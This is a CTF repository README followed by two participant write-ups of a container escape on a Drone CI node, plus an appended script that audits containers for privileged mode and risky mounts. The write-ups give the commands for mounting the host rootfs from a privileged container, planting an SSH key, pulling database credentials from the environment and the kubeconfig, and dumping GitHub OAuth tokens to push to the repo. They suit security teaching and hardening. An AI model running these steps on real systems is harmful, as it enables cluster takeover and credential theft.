Hack this repo and add your name to the list above. Creativity and style encouraged in both endeavors.

      ___           ___                   ___           ___
     /\  \         /\__\      ___        /\  \         /\  \
    /::\  \       /:/  /     /\  \       \:\  \       /::\  \
   /:/\:\  \     /:/  /      \:\  \       \:\  \     /:/\:\  \
  /::\~\:\  \   /:/  /       /::\__\      /::\  \   /::\~\:\  \
 /:/\:\ \:\__\ /:/__/     __/:/\/__/     /:/\:\__\ /:/\:\ \:\__\
 \:\~\:\ \/__/ \:\  \    /\/:/  /       /:/  \/__/ \:\~\:\ \/__/
  \:\ \:\__\    \:\  \   \::/__/       /:/  /       \:\ \:\__\
   \:\ \/__/     \:\  \   \:\__\       \/__/         \:\ \/__/
    \:\__\        \:\__\   \/__/                      \:\__\
     \/__/         \/__/                               \/__/
      ___           ___           ___           ___           ___           ___           ___
     /\__\         /\  \         /\  \         /\__\         /\  \         /\  \         /\  \
    /:/  /        /::\  \       /::\  \       /:/  /        /::\  \       /::\  \       /::\  \
   /:/__/        /:/\:\  \     /:/\:\  \     /:/__/        /:/\:\  \     /:/\:\  \     /:/\ \  \
  /::\  \ ___   /::\~\:\  \   /:/  \:\  \   /::\__\____   /::\~\:\  \   /::\~\:\  \   _\:\~\ \  \
 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/ \:\__\ /:/\:::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \ \__\
 \/__\:\/:/  / \/__\:\/:/  / \:\  \  \/__/ \/_|:|~~|~    \:\~\:\ \/__/ \/_|::\/:/  / \:\ \:\ \/__/
      \::/  /       \::/  /   \:\  \          |:|  |      \:\ \:\__\      |:|::/  /   \:\ \:\__\
      /:/  /        /:/  /     \:\  \         |:|  |       \:\ \/__/      |:|\/__/     \:\/:/  /
     /:/  /        /:/  /       \:\__\        |:|  |        \:\__\        |:|  |        \::/  /
     \/__/         \/__/         \/__/         \|__|         \/__/         \|__|         \/__/

CTF

Rules

It's hacking, there are no rules! Though you probably shouldn't break any local laws.

Requests

Please don't interfere with anyone else trying to capture the flag.

This includes:

  • removing someone else's back door
  • removing key pivot information
  • hardening the node/service
  • removing other folks from the list or force pushing to erase history

Share your victories and tips in #ctf.

If you think you broke something, reach out to walt.

Comments
  • Totally innocuous typo fix

    Explanation

    This abuses docker-in-docker volume mounts to open a remote shell on the Drone container itself. This hopefully better disguises the eventual --privileged escape. Once we mount the outer Drone worker, we chroot into it and create a reverse shell. From there, we spawn a privileged container, gain access to the node itself, and extract secrets from other containers running on the node.

    From the interactive remote shell, we can then freely spawn a --privileged container, mount the node's /, install an SSH key in /home/ec2-user/.ssh/authorized_keys, and discover the node's IP:

    # access the node's rootfs
    $ docker run --privileged --rm -it alpine
    $ mount /dev/nvme0n1p1 /mnt
    
    # install an ssh key
    $ cd /mnt/home/ec2-user/.ssh
    $ echo "<ssh public key>" >> .authorized_keys
    
    # discover the public IP
    $ apk add curl 
    $ curl ifconfig.me
    

    (not shown: accidentally hitting ctrl+c approximately 12 times and having to start over from scratch)

    Next, ssh into the node. It's a k8s node, so we can look for interesting docker containers. Looks like there's a drone server:

    $ docker ps | grep -i drone-server | grep -v pause
    243146925dfe        112b23978e25                                                            "/bin/drone-server"       17 hours ago        Up 17 hours                             k8s_server_drone-7cf8565555-wmnsw_drone_b6b3725e-223e-4793-97a7-eb07f412325c_0
    

    Exec into it and check out the env:

    $ docker exec -it 243146925dfe sh
    $ env
    [...]
    DRONE_DATABASE_DATASOURCE=<snip>
    [...]
    

    Grab the postgres connection details and return to the node. Open a postgres shell:

    $ psql -h <host> -p 5432 -U postgres
    postgres=> \dt
               List of relations
     Schema |    Name    | Type  |  Owner
    --------+------------+-------+----------
     public | builds     | table | postgres
     public | cron       | table | postgres
     public | latest     | table | postgres
     public | logs       | table | postgres
     public | migrations | table | postgres
     public | nodes      | table | postgres
     public | orgsecrets | table | postgres
     public | perms      | table | postgres
     public | repos      | table | postgres
     public | secrets    | table | postgres
     public | stages     | table | postgres
     public | steps      | table | postgres
     public | users      | table | postgres
    postgres=> select user_login,user_oauth_token from users;
      user_login  |             user_oauth_token
    --------------+------------------------------------------
     example | <snip>
    (1 row)
    

    With a github user and token, we can have some fun. Back on your own box, clone the repo over https:

    $ git clone https://github.com/danger-della/ctf.git
    $ cd ctf
    $ [... make some changes ...]
    $ git commit
    $ git push
    

    You'll be prompted for a username and password. Enter the username from above, and use the token as the password. The push should succeed. 🎉

  • Important features

    My solution:
    Create this PR and get a reverse shell.

    $ mount # observe /dev/nvme0n1p1
    $ mkdir /tmp/rootfs
    $ mount /dev/nvme0n1p1 /tmp/rootfs
    $ chroot /tmp/rootfs
    $ cd /tmp
    $ curl -LO https://dl.k8s.io/release/v1.22.0/bin/linux/amd64/kubectl
    $ chmod u+x kubectl
    $ # ... mess around a bit, see where the kubernetes files are ...
    $ # kubelets do not have the permission to *list* namespaces, I guessed `drone` correctly
    $ /tmp/kubectl --kubeconfig /var/lib/kubelet/kubeconfig -v 6 -n drone get pods -o yaml 2>&1 
    $ # observe that it uses configmap `drone`
    $ /tmp/kubectl --kubeconfig /var/lib/kubelet/kubeconfig -v 6 -n drone get configmap/drone -o yaml 2>&1
    $ # observe DRONE_DATABASE_DATASOURCE
    $ yum install postgresql # sorry for messing with the global state of the system
    $ psql postgres://...
    > select user_oauth_token from users;
    

    Then use GitHub API:

    #!/usr/bin/env python3
    
    from github import Github # pip install PyGithub
    
    g = Github("<...>snip<...>")
    repo = g.get_user().get_repos()[0]
    assert repo.name == "ctf"
    
    readme = next(f for f in repo.get_dir_contents("/") if f.name == "README.md")
    sha = readme.sha
    new_content = r"""
    <...>snip<...>
    """
    print(new_content)
    repo.update_file("README.md", "pwned", new_content, sha)
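
Added example, not part of either write-up or of the repo: a node-side audit over `docker inspect` JSON that flags the container properties both write-ups above depend on, namely privileged mode and bind mounts of the Docker socket or sensitive host paths. The sample data, container names and the path list are constructed assumptions.

```python
import json

# Constructed sample: trimmed `docker inspect` output for three containers.
# Container names and mount paths are made up for this example.
SAMPLE_INSPECT = json.loads("""
[
 {"Name": "/k8s_server_drone", "HostConfig": {"Privileged": false, "CapAdd": null},
  "Mounts": [{"Type": "bind", "Source": "/var/lib/kubelet/pods/x/volumes/data"}]},
 {"Name": "/drone-step-build", "HostConfig": {"Privileged": false, "CapAdd": null},
  "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock"}]},
 {"Name": "/eager_alpine", "HostConfig": {"Privileged": true, "CapAdd": null},
  "Mounts": []}
]
""")

# Host paths that hand a container control of the node (assumed list; extend it).
EXACT = {"/", "/home", "/var/lib/kubelet", "/var/lib/kubelet/kubeconfig",
         "/var/run/docker.sock", "/run/docker.sock"}
PREFIXES = ("/home/",)
ADMIN_CAPS = {"SYS_ADMIN", "CAP_SYS_ADMIN"}


def risky_source(src):
    """True if a bind-mount source exposes the node's rootfs, socket or keys."""
    src = src.rstrip("/") or "/"
    return src in EXACT or src.startswith(PREFIXES)


def audit(containers):
    """Map container name -> findings for containers that can reach the host."""
    report = {}
    for c in containers:
        host_cfg = c.get("HostConfig") or {}
        findings = []
        if host_cfg.get("Privileged"):
            findings.append("privileged")
        if ADMIN_CAPS & set(host_cfg.get("CapAdd") or []):
            findings.append("cap:SYS_ADMIN")
        for m in c.get("Mounts") or []:
            if m.get("Type") == "bind" and risky_source(m.get("Source", "")):
                findings.append("bind:" + m["Source"])
        if findings:
            report[c.get("Name", "?").lstrip("/")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(name, ", ".join(findings))
```

On a real node, the input would be the JSON array printed by `docker inspect $(docker ps -q)`; ordinary per-pod kubelet volume binds are deliberately not flagged.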
    
    